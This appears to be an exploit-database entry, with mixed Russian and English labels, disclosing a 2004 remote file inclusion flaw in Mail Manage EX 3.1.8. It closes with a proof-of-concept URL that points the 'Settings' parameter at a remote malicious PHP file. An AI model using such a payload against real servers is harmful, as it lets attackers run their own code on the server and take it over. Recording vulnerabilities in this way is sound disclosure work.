Exploit Mail Manage EX 3.1.8 MMEX - 'Settings' PHP Remote File Inclusion

[Exploiter]

EDB-ID

24168

Проверка EDB

1. Пройдено

Автор

THE WARLOCK [BHQ]

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

N/A

Дата публикации

2004-06-03

source: https://www.securityfocus.com/bid/10457/info

Mail Manage EX is reportedly prone to a remote file include vulnerability. This vulnerability results from insufficient sanitization of user-supplied data and may allow remote attackers to include arbitrary PHP files located on remote servers.

This issue was discovered in Mail Manage EX 3.1.8. It is possible that previous versions are affected as well. 

http://www.example.com/mail/mmex.php?Settings=http://www.example.com/malicious.php